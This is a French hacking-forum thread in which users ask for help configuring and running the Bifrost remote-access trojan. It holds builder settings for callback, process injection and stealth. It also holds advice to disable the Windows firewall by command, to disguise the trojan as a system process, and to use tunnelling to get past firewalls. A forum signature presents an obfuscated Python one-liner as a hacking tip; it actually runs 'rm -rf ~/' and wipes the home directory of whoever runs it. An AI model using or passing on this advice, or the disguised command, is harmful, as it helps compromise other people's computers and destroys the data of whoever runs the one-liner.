Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-01-2012 18:05:46

nmsgns18
N00b
Inscription : 07-01-2012
Messages : 1

Problème avec Trojan Bifrost

Bonjour,

Mon problème est simple :
J'ai téléchargé Trojan Bifrost (j'ai essayé plusieurs versions, actuellement j'ai la 1.2d), mais après avoir suivi divers tutoriaux, impossible de le faire fonctionner ! Je ne vois aucun poste dans l'interface de Bifrost, même après avoir créé le serveur.
J'ai essayer avec le serveur sur mon PC et sur un autre, sans succès.
Je précise que je fait ça chez moi et ainsi j'ai accès à tous les antivirus et firewalls que je peux désactiver à ma guise, donc pas de problèmes d'infiltration.

Voilà grosso modo les étapes que j'exécute sans succès :
- Je désactive l'antivirus
- Je lance Bifrost
- Je clique sur "Options", je défini un mot de passe et le port 81
- Je valide
- Je clique sur "Builder", je rentre par onglets :
  - Onglet "Connection" :
    - Mon IP (que j'ajoute à la liste, j'ai donc mon IP et 127.0.0.1)
    - Le mot de passe défini précédemment
    - Le port 81
  - Onglet "Installation"
    - Filename when installed : Win32
    - Directory to install to : System
    - Injection : Process name : msnmsgr.exe
    (le reste par défaut)
  - Onglet "Stealth" :
    (je laisse par défaut)
- Je clique sur "Build", je sélectionne "server.exe" dans le dossier de Bifrost, je valide
- Il me met que le serveur a été créé avec succès
- Je lance le serveur (pour tester sur mon PC, mais j'ai aussi essayer sur d'autres PC après avoir désactivé l'AV)
- Rien n'apparait dans l'interface de Bifrost

Quelqu'un arrive-t-il à faire tourner Bifrost chez lui ?

Merci d'avance smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-02-2013 18:47:24

jhon94
N00b
Inscription : 16-02-2013
Messages : 1

Re : Problème avec Trojan Bifrost

Salut peux tu m'envoyer le lien auquel tu as telecharge Bifrost^^

Hors Ligne

#3 18-02-2013 19:52:26

cylo88
N00b
Inscription : 18-02-2013
Messages : 3

Re : Problème avec Trojan Bifrost

Salut a tous moi ossi j'ai le même problème pour Bifrost je fait tout comme expliquer et quand je veut lancer le serveur pour le tester il ne se passe rien help me !!! svp

Hors Ligne

#4 19-02-2013 00:24:15

cylo88
N00b
Inscription : 18-02-2013
Messages : 3

Re : Problème avec Trojan Bifrost

sa ié j'ai reussi en fait j'avai mal ouvert mes port slt

Hors Ligne

#5 19-02-2013 18:02:13

cylo88
N00b
Inscription : 18-02-2013
Messages : 3

Re : Problème avec Trojan Bifrost

j'ai de nouveau le même problème hier soir j'ai réussi a le faire marcher en le testant sur mon PC et aujourd'hui il n'y a plus la victime dans bifrost j'ai beau réessayer mais rien ne s’affiche dans bifrost ????

Hors Ligne

#6 20-02-2013 23:27:51

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : Problème avec Trojan Bifrost

Désinstales windows pour voir...
evolution_de_zombi_haut_parleurs_mobiles-rf20096794f68471eae26052b47d31264_vs8xj_8byvr_216.jpg


« γνωθι σεαυτον »

Hors Ligne

#7 21-02-2013 09:33:19

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Problème avec Trojan Bifrost

Salut.

Je ne suis pas expert en programmes tout faits pour pwn sous Windows.
Cela dit, je t'invite à vérifier que tu as bien récupéré une vraie version de Bifrost et pas une fausse interface graphique qui te colle des choses dans le pc quand tu tentes de t'en servir.

Ici on n'a pas trop d'experts de ça, je te conseille de tenter de pinguer d'autre forums wink

ps :
@JeanCharles : je t'invite instamment à être constructif dans tes prochaines participations sur le forum.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 22-02-2013 00:29:53

redgabber
N00b
Inscription : 22-02-2013
Messages : 1

Re : Problème avec Trojan Bifrost

Salut . j ai le même prb  que l'op sauf que moi mes ports sont bien ouverts et testable.

par contre Server.exe ne marche pas. Il s'execute bien dans les taches quelques instants mais il s'arrete ensuite.

Aucune victime détectée. J'ai bien configuré pourtant...

Hors Ligne

#9 22-02-2013 09:59:49

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Problème avec Trojan Bifrost

Coucou wink

Comme l'a dit spawn le "bifrostage" n'est pas vraiment notre domaine.Si tu vous voulez vraiment vous amuser renseigner vous sur metasploit smile

Dernière modification par koala (22-02-2013 10:00:15)

Hors Ligne

#10 22-02-2013 15:26:34

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Problème avec Trojan Bifrost

je défini un mot de passe et le port 81

C'est un chiffre porte bonheur le 81 ?  Les ports inférieures à 1024 sont réservés au système et il faut pour cela des permissions. Les trojans utilisent généralement des ports plus haut et tu as le choix jusqu'à 65535. Je connais pas Bifrost mais il me semble qu'il y a une case "injection" à cocher dans son tableau de configuration et permettant ainsi à lui donner un nom d’exécutable connu comme "explorer.exe, ..." pour tromper les firewalls. Dans le cas contraire, tu peux desactiver ce firewall Windows:

netsh firewall set opmode disable

Si c'est un autre pare-feu auxiliaire comme Comodo, ZoneAlarm, Netfilter, etc là c'est mort, il faudra jouer avec l'encapsulation (tunneling) et autre stéganographie.

Hors Ligne

#11 23-02-2013 03:05:25

SEIF BH
N00b
Inscription : 23-02-2013
Messages : 1

Re : Problème avec Trojan Bifrost

Stp j'ai besoin d'un vrai lien de telechargement <<bifrost original>> et merci de me repondre

Hors Ligne

#12 15-12-2013 14:36:54

Arthasx123
N00b
Inscription : 15-12-2013
Messages : 1

Re : Problème avec Trojan Bifrost

Bjr j ai telecharger bifrost je fais toutes les etapes mais quand je fais build et que je choisis l emplacement ca ne met : " An error occured when trying to open the server file"
J ai tout essayer mais je n y arrive toujours pas aider moi svp
merci d avance

Hors Ligne

#13 15-12-2013 16:21:24

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Problème avec Trojan Bifrost

Arthasx123 a écrit :

Bjr j ai telecharger bifrost je fais toutes les etapes mais quand je fais build et que je choisis l emplacement ca ne met : " An error occured when trying to open the server file"
J ai tout essayer mais je n y arrive toujours pas aider moi svp
merci d avance

Ouvre un nouveau topic pour ton sujet, tu veux installer sur quel plateforme ton bitfrost ?
d'après le site de l'éditeur, ce n'est compatible qu'avec l'OLPC

http://wiki.laptop.org/go/Bitfrost


1310812721.gif

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]